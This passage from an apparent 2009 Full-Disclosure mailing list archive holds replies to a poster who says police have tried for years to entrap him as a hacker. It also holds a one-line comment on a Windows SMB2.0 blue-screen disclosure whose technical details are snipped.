haven't even when they sent informants to set me up. They're just 
bugging me because I know about computers.

regards
the learner aka
MrX



Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread Jeff MacDonald
On Wednesday 09 September 2009 19:44:07 TheLearner wrote:
[...snipped...]

 What would you do?

 Please help. This guy is just shutting my life down.

 regards
 the learner aka
 MrX


do you obtain and use all of your content (music, movies, tvshows) fairly? 

if this guy really is a detective, find out who he is and what agency he is 
affiliated with (if any).

after that you can decide what to do.

regards,
J
-- 
Zoid Technologies: Custom Information Systems
http://zoidtechnologies.com/



Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread auto199984
I would suggest you see a psychologist or psychiatrist to rule out 
paranoia/schizophrenia/etc. just to be on the safe side.

On Wed, 09 Sep 2009 17:44:07 -0600 TheLearner 
mrxisapl...@hush.com wrote:
[...snipped...]


Re: [Full-disclosure] Question about police harassment. Police trying over years to entrap me as hacker.

2009-09-09 Thread David Shaw
On Wed, Sep 9, 2009 at 11:43 AM, mrx m...@propergander.org.uk wrote:


 Does anybody care?

 In fact does anybody who contributes anything useful to this list use
 Hushmail? (at this time I am too lazy to look). If not I can set my spam
 filter. Amusing as it has been, it has grown tiresome.


Huh. Yeah, I don't know. I think I'll set a filter on hushmail. Oh, wait,
then I wouldn't get all your other messages!

On Wed, Sep 9, 2009 at 4:44 PM, TheLearner mrxisapl...@hush.com wrote:

 I basically got no friends left. Every last friend I have this
 local detective has pegged every last buddy I have. I'm stuck in my
 house with nobody to turn to..

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-09 Thread James Matthews
So Msoft! why can't they just stop reintroducing bugs?

On Wed, Sep 9, 2009 at 11:04 AM, random...@hushmail.com wrote:

 [...snipped...]




-- 
http://www.jewelerslounge.com